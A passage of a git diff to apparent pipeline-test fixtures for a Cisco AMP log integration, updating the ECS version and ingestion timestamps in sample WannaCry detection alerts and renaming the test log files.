pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -7044,7 +7044,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7076,7 +7076,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843780555Z",
+                "ingested": "2021-09-13T18:07:04.510491236Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7133,7 +7133,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7165,7 +7165,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843782466Z",
+                "ingested": "2021-09-13T18:07:04.510493135Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7222,7 +7222,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7254,7 +7254,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843784355Z",
+                "ingested": "2021-09-13T18:07:04.510494993Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7311,7 +7311,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7343,7 +7343,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843786245Z",
+                "ingested": "2021-09-13T18:07:04.510496868Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7400,7 +7400,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7432,7 +7432,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843788123Z",
+                "ingested": "2021-09-13T18:07:04.510498746Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7489,7 +7489,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7521,7 +7521,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843790009Z",
+                "ingested": "2021-09-13T18:07:04.510500626Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7578,7 +7578,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7610,7 +7610,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843791900Z",
+                "ingested": "2021-09-13T18:07:04.510506069Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7667,7 +7667,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7699,7 +7699,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843793783Z",
+                "ingested": "2021-09-13T18:07:04.510508336Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7756,7 +7756,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7788,7 +7788,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843795681Z",
+                "ingested": "2021-09-13T18:07:04.510510239Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7845,7 +7845,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7877,7 +7877,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843806383Z",
+                "ingested": "2021-09-13T18:07:04.510512116Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -7939,7 +7939,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -7969,7 +7969,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843808566Z",
+                "ingested": "2021-09-13T18:07:04.510513970Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -8028,7 +8028,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -8058,7 +8058,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843810485Z",
+                "ingested": "2021-09-13T18:07:04.510515850Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
similarity index 98%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
index 485829d5bda..e0b337505a5 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json
@@ -19,7 +19,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -51,7 +51,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500123245Z",
+                "ingested": "2021-09-13T18:07:28.111129724Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -108,7 +108,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -128,7 +128,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500128111Z",
+                "ingested": "2021-09-13T18:07:28.111134931Z",
